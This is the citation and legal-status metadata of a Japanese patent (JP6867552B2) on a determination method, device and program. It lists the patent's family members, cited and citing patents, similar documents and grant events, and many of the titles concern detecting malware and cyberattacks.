| PCT/JP2019/016207 WO2019225214A1 (ja) | 2018-05-21 | 2019-04-15 | 判定方法、判定装置および判定プログラム |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| JPWO2019225214A1 JPWO2019225214A1 (ja) | 2020-12-10 |
| JP6867552B2 true JP6867552B2 (ja) | 2021-04-28 |
Family
ID=68616375
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| JP2020521093A Active JP6867552B2 (ja) | 2018-05-21 | 2019-04-15 | 判定方法、判定装置および判定プログラム |
Country Status (5)
| Country | Link |
|---|---|
| US (1) | US11797670B2 (ja) |
| EP (1) | EP3783845B1 (ja) |
| JP (1) | JP6867552B2 (ja) |
| AU (1) | AU2019273972B2 (ja) |
| WO (1) | WO2019225214A1 (ja) |
Families Citing this family (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20220284109A1 (en) * | 2019-08-27 | 2022-09-08 | Nec Corporation | Backdoor inspection apparatus, backdoor inspection method, and non-transitory computer readable medium |
| US12289323B1 (en) * | 2021-06-30 | 2025-04-29 | Rapid7, Inc. | Recognizing and mitigating successful cyberattacks |
| US12088609B1 (en) * | 2021-09-29 | 2024-09-10 | Amazon Technologies, Inc. | Investigative playbooks for cloud security events |
| US12393687B2 (en) * | 2022-10-24 | 2025-08-19 | Okta, Inc. | Techniques for detecting command injection attacks |
| CN119324840B (zh) * | 2024-12-18 | 2025-03-18 | 宁波港信息通信有限公司 | Sql注入攻击检测方法、系统及相关设备 |
Family Cites Families (10)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8935773B2 (en) * | 2009-04-09 | 2015-01-13 | George Mason Research Foundation, Inc. | Malware detector |
| KR101291782B1 (ko) * | 2013-01-28 | 2013-07-31 | 인포섹(주) | 웹쉘 탐지/대응 시스템 |
| JP2014232923A (ja) * | 2013-05-28 | 2014-12-11 | 日本電気株式会社 | 通信装置、サイバー攻撃検出方法、及びプログラム |
| JP6314036B2 (ja) * | 2014-05-28 | 2018-04-18 | 株式会社日立製作所 | マルウェア特徴抽出装置、マルウェア特徴抽出システム、マルウェア特徴方法及び対策指示装置 |
| US9787695B2 (en) * | 2015-03-24 | 2017-10-10 | Qualcomm Incorporated | Methods and systems for identifying malware through differences in cloud vs. client behavior |
| JP2017004123A (ja) * | 2015-06-05 | 2017-01-05 | 日本電信電話株式会社 | 判定装置、判定方法および判定プログラム |
| US10476891B2 (en) * | 2015-07-21 | 2019-11-12 | Attivo Networks Inc. | Monitoring access of network darkspace |
| RU2634211C1 (ru) * | 2016-07-06 | 2017-10-24 | Общество с ограниченной ответственностью "Траст" | Способ и система анализа протоколов взаимодействия вредоносных программ с центрами управления и выявления компьютерных атак |
| US10614222B2 (en) * | 2017-02-21 | 2020-04-07 | Microsoft Technology Licensing, Llc | Validation of security monitoring through automated attack testing |
| WO2019013266A1 (ja) | 2017-07-12 | 2019-01-17 | 日本電信電話株式会社 | 判定装置、判定方法、および、判定プログラム |
-
2019
- 2019-04-15 JP JP2020521093A patent/JP6867552B2/ja active Active
- 2019-04-15 US US17/056,457 patent/US11797670B2/en active Active
- 2019-04-15 EP EP19807702.6A patent/EP3783845B1/en active Active
- 2019-04-15 WO PCT/JP2019/016207 patent/WO2019225214A1/ja not_active Ceased
- 2019-04-15 AU AU2019273972A patent/AU2019273972B2/en active Active
Also Published As
| Publication number | Publication date |
|---|---|
| EP3783845A4 (en) | 2021-12-29 |
| EP3783845B1 (en) | 2022-10-05 |
| US20210211459A1 (en) | 2021-07-08 |
| AU2019273972B2 (en) | 2022-05-19 |
| EP3783845A1 (en) | 2021-02-24 |
| JPWO2019225214A1 (ja) | 2020-12-10 |
| AU2019273972A1 (en) | 2020-12-03 |
| WO2019225214A1 (ja) | 2019-11-28 |
| US11797670B2 (en) | 2023-10-24 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| JP6867552B2 (ja) | 判定方法、判定装置および判定プログラム | |
| US10599841B2 (en) | System and method for reverse command shell detection | |
| US10133866B1 (en) | System and method for triggering analysis of an object for malware in response to modification of that object | |
| US10313370B2 (en) | Generating malware signatures based on developer fingerprints in debug information | |
| JP6708794B2 (ja) | 判定装置、判定方法、および、判定プログラム | |
| CN108664793B (zh) | 一种检测漏洞的方法和装置 | |
| EP3783846B1 (en) | Determination method, determination device and determination program | |
| CN112182569A (zh) | 一种文件识别方法、装置、设备及存储介质 | |
| Li et al. | A review on signature-based detection for network threats | |
| KR20210076455A (ko) | Xss 공격 검증 자동화 방법 및 그 장치 | |
| US12542806B2 (en) | Analysis device, analysis method, and analysis system | |
| JP7677416B2 (ja) | アラート検証装置、アラート検証方法及びアラート検証プログラム | |
| US20260030346A1 (en) | Autonomous Cyber-Security Investigation and Response using Graphs | |
| CN116155530A (zh) | 网络攻击的判定方法、电子设备及计算机可读存储介质 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| A621 | Written request for application examination |
Free format text: JAPANESE INTERMEDIATE CODE: A621 Effective date: 20200515 |
|
| TRDD | Decision of grant or rejection written | ||
| A01 | Written decision to grant a patent or to grant a registration (utility model) |
Free format text: JAPANESE INTERMEDIATE CODE: A01 Effective date: 20210406 |
|
| A61 | First payment of annual fees (during grant procedure) |
Free format text: JAPANESE INTERMEDIATE CODE: A61 Effective date: 20210408 |
|
| R150 | Certificate of patent or registration of utility model |
Ref document number: 6867552 Country of ref document: JP Free format text: JAPANESE INTERMEDIATE CODE: R150 |
|
| S533 | Written request for registration of change of name |
Free format text: JAPANESE INTERMEDIATE CODE: R313533 |
|
| R350 | Written notification of registration of transfer |
Free format text: JAPANESE INTERMEDIATE CODE: R350 |